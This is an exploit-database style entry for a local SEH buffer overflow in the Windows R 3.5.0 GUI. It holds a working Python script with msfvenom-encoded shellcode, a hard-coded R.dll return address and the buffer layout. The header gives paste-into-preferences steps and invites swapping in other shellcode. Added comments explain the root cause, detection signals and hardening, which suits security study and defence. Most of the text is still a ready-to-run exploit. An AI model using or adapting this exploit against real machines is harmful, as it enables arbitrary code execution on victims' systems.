
"R 3.5.0 - Local Buffer Overflow (SEH)"

Author

"Dino Covotsos"

Platform

windows

Release date

2019-01-31



#!/usr/bin/python
# Exploit Title: R i386 3.5.0 - Local Buffer Overflow (SEH)
# Date: 30/01/2019
# Exploit Author: Dino Covotsos - Telspace Systems
# Vendor Homepage: https://www.r-project.org/
# Version: 3.5.0
# Software Link: https://cran.r-project.org/bin/windows/base/old/3.5.0/R-3.5.0-win.exe
# Contact: services[@]telspace.co.za
# Twitter: @telspacesystems (Greets to the Telspace Crew)
# Version: 3.5.0
# Tested on: Windows XP Prof SP3 ENG x86
# Note: SEH exploitation method (SEH + DEP Bypass exploit for Windows 7 x86 by Bzyo available on exploit-db)
# CVE: TBC from Mitre
# Created in preparation for OSCE - DC - Telspace Systems
# PoC:
# 1.) Generate exploit.txt, copy the contents to clipboard
# 2.) In the application, open 'Edit' then 'Gui Preferences'
# 3.) Paste the contents of exploit.txt under 'Language for menus and messages'
# 4.) Click OK - Calc POPS (or change shellcode to whatever you require, take note of badchars!)

#PPR Information
#Message=  0x6cb99185 : pop ebx # pop esi # ret 0x08 |  {PAGE_EXECUTE_READ} [R.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v3.5.0

#msfvenom -a x86 --platform windows -p windows/exec cmd=calc.exe -e x86/shikata_ga_nai -b "\x00\x0a\x0d\x1a\x7d" -f c
# Encoded payload bytes, produced by the msfvenom command in the comment above:
# windows/exec running calc.exe, i.e. a benign proof-of-execution marker.
# The blob is encoder output (x86/shikata_ga_nai), so its bytes differ on every
# generation; matching this exact string is a weak detection. A child process
# spawned by the R GUI shortly after a preferences change is the more durable
# signal to alert on.
# The -b list in that command names the bytes the author excluded from the
# payload, presumably because the input path alters them (TODO confirm).
shellcode = ("\xd9\xc6\xb8\x06\x7f\x92\x78\xd9\x74\x24\xf4\x5b\x29\xc9\xb1"
"\x31\x83\xc3\x04\x31\x43\x14\x03\x43\x12\x9d\x67\x84\xf2\xe3"
"\x88\x75\x02\x84\x01\x90\x33\x84\x76\xd0\x63\x34\xfc\xb4\x8f"
"\xbf\x50\x2d\x04\xcd\x7c\x42\xad\x78\x5b\x6d\x2e\xd0\x9f\xec"
"\xac\x2b\xcc\xce\x8d\xe3\x01\x0e\xca\x1e\xeb\x42\x83\x55\x5e"
"\x73\xa0\x20\x63\xf8\xfa\xa5\xe3\x1d\x4a\xc7\xc2\xb3\xc1\x9e"
"\xc4\x32\x06\xab\x4c\x2d\x4b\x96\x07\xc6\xbf\x6c\x96\x0e\x8e"
"\x8d\x35\x6f\x3f\x7c\x47\xb7\x87\x9f\x32\xc1\xf4\x22\x45\x16"
"\x87\xf8\xc0\x8d\x2f\x8a\x73\x6a\xce\x5f\xe5\xf9\xdc\x14\x61"
"\xa5\xc0\xab\xa6\xdd\xfc\x20\x49\x32\x75\x72\x6e\x96\xde\x20"
"\x0f\x8f\xba\x87\x30\xcf\x65\x77\x95\x9b\x8b\x6c\xa4\xc1\xc1"
"\x73\x3a\x7c\xa7\x74\x44\x7f\x97\x1c\x75\xf4\x78\x5a\x8a\xdf"
"\x3d\x94\xc0\x42\x17\x3d\x8d\x16\x2a\x20\x2e\xcd\x68\x5d\xad"
"\xe4\x10\x9a\xad\x8c\x15\xe6\x69\x7c\x67\x77\x1c\x82\xd4\x78"
"\x35\xe1\xbb\xea\xd5\xc8\x5e\x8b\x7c\x15")

# Oversized value for the 'Language for menus and messages' field (see the PoC
# steps in the header). Layout, left to right:
#   "A" * 884      filler up to the exception-handler record on the stack; the
#                  offset is presumably specific to the tested build (R 3.5.0 on
#                  Windows XP SP3 per the header) -- TODO confirm elsewhere
#   4 + 4 bytes    overwrite that record's two fields; the second value is
#                  0x6cb99185 in little-endian order, the R.dll address listed
#                  under "PPR Information" above
#   remainder      NOP padding, the payload, and "D" filler
# Root cause, for defenders: the field value appears to be copied into a
# fixed-size stack buffer without a length check (inferred from the crash class;
# the vulnerable source is not shown on this page).
# Hardening notes: the header lists R.dll with ASLR False and SafeSEH False.
# Linking the module with /SAFESEH and /DYNAMICBASE, plus OS-level SEHOP and DEP,
# removes the fixed, unvalidated handler address this layout depends on. The
# header also mentions a DEP-bypass variant for Windows 7, so DEP alone should
# not be treated as the fix; bounding the input length is.
buffer = "A" * 884 + "\xEB\x09\x90\x90" + "\x85\x91\xb9\x6c" + "\x90" * 20 + shellcode + "D" * 8868

# Alias only: no further transformation is applied before the value is written.
payload = buffer
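# Write the generated test input to exploit.txt in the current directory.
# Python 2 print statements are kept to match the rest of the script.
try:
    # The context manager closes the handle even if write() fails part-way,
    # which the original open()/close() pair did not guarantee.
    with open("exploit.txt","w") as f:
        print "[+] Creating %s bytes evil payload.." %len(payload)
        f.write(payload)
    print "[+] File created!"
except (IOError, OSError):
    # Only file-system failures are reported here; a bare except would also
    # swallow KeyboardInterrupt and programming errors such as NameError.
    print "File cannot be created"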